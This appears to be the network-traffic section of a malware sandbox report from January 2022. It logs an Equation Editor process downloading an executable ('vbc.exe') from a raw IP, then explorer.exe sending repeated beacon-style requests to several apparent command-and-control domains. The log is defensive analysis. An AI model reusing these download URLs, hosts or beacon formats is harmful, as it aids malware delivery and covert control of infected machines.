Jan 13, 2022 20:22:55.004324913 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004340887 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004357100 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004367113 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004369974 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004371881 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004386902 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004400969 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004405975 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004405975 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004422903 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004441023 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004456043 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004472017 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004475117 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004481077 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004590988 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.031284094 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031306028 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031322002 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031337976 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031373024 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031389952 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031408072 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.031421900 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031443119 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.031452894 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031487942 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.031506062 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.031553984 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.031932116 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.031950951 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.058815002 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:23:00.219388962 CET | 49170 | 80 | 192.168.2.22 | 122.10.28.11
Jan 13, 2022 20:23:00.496140003 CET | 80 | 49170 | 122.10.28.11 | 192.168.2.22
Jan 13, 2022 20:23:00.496301889 CET | 49170 | 80 | 192.168.2.22 | 122.10.28.11
Jan 13, 2022 20:23:00.496769905 CET | 49170 | 80 | 192.168.2.22 | 122.10.28.11
Jan 13, 2022 20:23:00.774905920 CET | 80 | 49170 | 122.10.28.11 | 192.168.2.22
Jan 13, 2022 20:23:00.774945021 CET | 80 | 49170 | 122.10.28.11 | 192.168.2.22
Jan 13, 2022 20:23:00.774965048 CET | 80 | 49170 | 122.10.28.11 | 192.168.2.22
Jan 13, 2022 20:23:00.775353909 CET | 49170 | 80 | 192.168.2.22 | 122.10.28.11
Jan 13, 2022 20:23:00.775521040 CET | 49170 | 80 | 192.168.2.22 | 122.10.28.11
Jan 13, 2022 20:23:01.052043915 CET | 80 | 49170 | 122.10.28.11 | 192.168.2.22
Jan 13, 2022 20:23:05.961662054 CET | 49171 | 80 | 192.168.2.22 | 216.172.160.188
Jan 13, 2022 20:23:06.111922979 CET | 80 | 49171 | 216.172.160.188 | 192.168.2.22
Jan 13, 2022 20:23:06.112740040 CET | 49171 | 80 | 192.168.2.22 | 216.172.160.188
Jan 13, 2022 20:23:06.112768888 CET | 49171 | 80 | 192.168.2.22 | 216.172.160.188
Jan 13, 2022 20:23:06.259705067 CET | 80 | 49171 | 216.172.160.188 | 192.168.2.22
Jan 13, 2022 20:23:06.319093943 CET | 80 | 49171 | 216.172.160.188 | 192.168.2.22
Jan 13, 2022 20:23:06.319129944 CET | 80 | 49171 | 216.172.160.188 | 192.168.2.22
Jan 13, 2022 20:23:06.319145918 CET | 80 | 49171 | 216.172.160.188 | 192.168.2.22
Jan 13, 2022 20:23:06.319312096 CET | 49171 | 80 | 192.168.2.22 | 216.172.160.188
Jan 13, 2022 20:23:06.319381952 CET | 49171 | 80 | 192.168.2.22 | 216.172.160.188
Jan 13, 2022 20:23:06.459377050 CET | 80 | 49171 | 216.172.160.188 | 192.168.2.22
Jan 13, 2022 20:23:11.477966070 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.618901968 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.619119883 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.619415045 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.760226965 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771730900 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771794081 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771842003 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771881104 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771924973 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771960974 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.771965027 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.771994114 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.772003889 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.772044897 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.772053957 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.772088051 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.772109985 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.772140980 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:11.772206068 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.772219896 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.772306919 CET | 49172 | 80 | 192.168.2.22 | 192.185.98.251
Jan 13, 2022 20:23:11.932857990 CET | 80 | 49172 | 192.185.98.251 | 192.168.2.22
Jan 13, 2022 20:23:17.089534044 CET | 49174 | 80 | 192.168.2.22 | 221.121.143.148
Jan 13, 2022 20:23:17.359461069 CET | 80 | 49174 | 221.121.143.148 | 192.168.2.22
Jan 13, 2022 20:23:17.359688044 CET | 49174 | 80 | 192.168.2.22 | 221.121.143.148
Jan 13, 2022 20:23:17.360008955 CET | 49174 | 80 | 192.168.2.22 | 221.121.143.148
Jan 13, 2022 20:23:17.639343023 CET | 80 | 49174 | 221.121.143.148 | 192.168.2.22
Jan 13, 2022 20:23:17.639389992 CET | 80 | 49174 | 221.121.143.148 | 192.168.2.22
Jan 13, 2022 20:23:17.639810085 CET | 49174 | 80 | 192.168.2.22 | 221.121.143.148
Jan 13, 2022 20:23:17.639930964 CET | 49174 | 80 | 192.168.2.22 | 221.121.143.148
Jan 13, 2022 20:23:17.891347885 CET | 80 | 49174 | 221.121.143.148 | 192.168.2.22
Jan 13, 2022 20:23:22.838606119 CET | 49175 | 80 | 192.168.2.22 | 23.80.120.93
Jan 13, 2022 20:23:23.008239031 CET | 80 | 49175 | 23.80.120.93 | 192.168.2.22
Jan 13, 2022 20:23:23.008527040 CET | 49175 | 80 | 192.168.2.22 | 23.80.120.93
Jan 13, 2022 20:23:23.008996964 CET | 49175 | 80 | 192.168.2.22 | 23.80.120.93
Jan 13, 2022 20:23:23.381628990 CET | 80 | 49175 | 23.80.120.93 | 192.168.2.22
Jan 13, 2022 20:23:23.537935019 CET | 80 | 49175 | 23.80.120.93 | 192.168.2.22
Jan 13, 2022 20:23:23.537996054 CET | 80 | 49175 | 23.80.120.93 | 192.168.2.22
Jan 13, 2022 20:23:23.538315058 CET | 49175 | 80 | 192.168.2.22 | 23.80.120.93
Jan 13, 2022 20:23:23.538501978 CET | 49175 | 80 | 192.168.2.22 | 23.80.120.93
Jan 13, 2022 20:23:23.707668066 CET | 80 | 49175 | 23.80.120.93 | 192.168.2.22
Jan 13, 2022 20:23:23.707696915 CET | 80 | 49175 | 23.80.120.93 | 192.168.2.22
Jan 13, 2022 20:23:23.707772970 CET | 49175 | 80 | 192.168.2.22 | 23.80.120.93

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2022 20:22:49.336359024 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:22:49.503792048 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:22:54.885034084 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:22:54.913263083 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:00.037771940 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:00.218267918 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:05.811104059 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:05.959788084 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:11.327357054 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:11.476555109 CET | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:16.774473906 CET | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:17.087388039 CET | 53 | 55616 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:22.669341087 CET | 49972 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:22.836792946 CET | 53 | 49972 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:28.536506891 CET | 51771 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:28.839101076 CET | 53 | 51771 | 8.8.8.8 | 192.168.2.22
Jan 13, 2022 20:23:38.849476099 CET | 59867 | 53 | 192.168.2.22 | 8.8.8.8
Jan 13, 2022 20:23:39.019042969 CET | 53 | 59867 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2022 20:22:49.336359024 CET | 192.168.2.22 | 8.8.8.8 | 0xb710 | Standard query (0) | www.orphe.biz | A (IP address) | IN (0x0001)
Jan 13, 2022 20:22:54.885034084 CET | 192.168.2.22 | 8.8.8.8 | 0x439c | Standard query (0) | www.circlessalaries.com | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:00.037771940 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.ylhwcl.com | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:05.811104059 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.terapiaholisticaemformacao.com | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:11.327357054 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.ecommerceoptimise.com | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:16.774473906 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.integratedheartspsychology.com | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:22.669341087 CET | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.bjbwx114.com | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:28.536506891 CET | 192.168.2.22 | 8.8.8.8 | 0xbd42 | Standard query (0) | www.topeasyip.company | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:38.849476099 CET | 192.168.2.22 | 8.8.8.8 | 0x95dc | Standard query (0) | www.norfg.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2022 20:22:49.503792048 CET | 8.8.8.8 | 192.168.2.22 | 0xb710 | No error (0) | www.orphe.biz |  | 103.224.212.220 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:22:54.913263083 CET | 8.8.8.8 | 192.168.2.22 | 0x439c | No error (0) | www.circlessalaries.com |  | 195.211.74.112 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:00.218267918 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.ylhwcl.com |  | 122.10.28.11 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:05.959788084 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.terapiaholisticaemformacao.com | terapiaholisticaemformacao.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2022 20:23:05.959788084 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | terapiaholisticaemformacao.com |  | 216.172.160.188 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:11.476555109 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.ecommerceoptimise.com | ecommerceoptimise.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2022 20:23:11.476555109 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | ecommerceoptimise.com |  | 192.185.98.251 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:17.087388039 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.integratedheartspsychology.com |  | 221.121.143.148 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:22.836792946 CET | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.bjbwx114.com |  | 23.80.120.93 | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:28.839101076 CET | 8.8.8.8 | 192.168.2.22 | 0xbd42 | Name error (3) | www.topeasyip.company | none | none | A (IP address) | IN (0x0001)
Jan 13, 2022 20:23:39.019042969 CET | 8.8.8.8 | 192.168.2.22 | 0x95dc | No error (0) | www.norfg.com |  | 43.134.0.76 | A (IP address) | IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • 198.23.213.59
                                                  • www.orphe.biz
                                                  • www.circlessalaries.com
                                                  • www.ylhwcl.com
                                                  • www.terapiaholisticaemformacao.com
                                                  • www.ecommerceoptimise.com
                                                  • www.integratedheartspsychology.com
                                                  • www.bjbwx114.com

                                                  HTTP Packets

                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  0 | 192.168.2.22 | 49167 | 198.23.213.59 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Jan 13, 2022 20:21:55.695291996 CET | 0 | OUT | GET /1155/vbc.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 198.23.213.59
                                                  Connection: Keep-Alive
                                                  Jan 13, 2022 20:21:55.811695099 CET | 1 | IN | HTTP/1.1 200 OK
                                                  Date: Fri, 14 Jan 2022 02:21:54 GMT
                                                  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26
                                                  Last-Modified: Thu, 13 Jan 2022 22:04:27 GMT
                                                  ETag: "66000-5d57ddeb75e04"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 417792
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  1 | 192.168.2.22 | 49168 | 103.224.212.220 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Jan 13, 2022 20:22:49.687273026 CET | 439 | OUT | GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1
                                                  Host: www.orphe.biz
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:22:49.874944925 CET | 440 | IN | HTTP/1.1 302 Found
                                                  Date: Thu, 13 Jan 2022 19:22:49 GMT
                                                  Server: Apache/2.4.25 (Debian)
                                                  Set-Cookie: __tad=1642101769.6856294; expires=Sun, 11-Jan-2032 19:22:49 GMT; Max-Age=315360000
                                                  Location: http://ww25.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==&subid1=20220114-0622-493b-bd82-791d388f7025
                                                  Content-Length: 0
                                                  Connection: close
                                                  Content-Type: text/html; charset=UTF-8


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  2 | 192.168.2.22 | 49169 | 195.211.74.112 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Jan 13, 2022 20:22:54.941361904 CET | 441 | OUT | GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.circlessalaries.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:22:54.977261066 CET | 442 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 13 Jan 2022 19:22:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Powered-By: PHP/7.2.24


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  3 | 192.168.2.22 | 49170 | 122.10.28.11 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Jan 13, 2022 20:23:00.496769905 CET | 495 | OUT | GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1
                                                  Host: www.ylhwcl.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:00.774905920 CET | 496 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 13 Jan 2022 19:23:00 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 1865
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 c5 b1 b1 d5 d7 d5 d5 cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 39 35 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 2c 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 
30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 33 34 35 33 3b 26 23 32 33 34 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 32 35 34 34 32 3b 26 23 32 30 30 31 30 3b 26 23 32 33 30 33 39 3b 26 23 32 31 31 38 33 3b 26 23 32 31 33 35 35 3b 26 23 32 39 39 38 33 3b 26 23 33 38 33 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 34 34 35 36 3b 26 23 34 30 36 34 34 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 37 32 3b 26 23 33 32 39 30 35 3b 26 23 32 31 31 36 30 3b 26 23 32
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;</title><meta name="keywords" content="&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#28459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;" /><meta name="description" content="&#23453;&#23453;&#25105;&#20204;&#25442;&#20010;&#23039;&#21183;&#21355;&#29983;&#38388;&#35270;&#39057;,&#20813;&#36153;&#24456;&#40644;&#26080;&#36974;&#25377;&#30340;&#35270;&#39057;,&#26080;&#36974;&#25377;&#72;&#32905;&#21160;&#2
Jan 13, 2022 20:23:00.774945021 CET | 497 | IN | Data Raw: 38 34 35 39 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30
                                                  Data Ascii: 8459;&#32593;&#31449;&#20813;&#36153;&#35266;&#30475;,&#31934;&#21697;&#22269;&#20135;&#95;&#20122;&#27954;&#20154;&#25104;&#22312;&#32447;,&#20174;&#23567;&#29992;&#26149;&#33647;&#20859;&#22823;&#30340;&#21452;&#24615;&#21463;,&#20122;&#2795


Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 216.172.160.188 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2022 20:23:06.112768888 CET | 498 | OUT | GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.terapiaholisticaemformacao.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
Jan 13, 2022 20:23:06.319093943 CET | 499 | IN | HTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:06 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 26 Jul 2019 13:18:26 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 2361
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
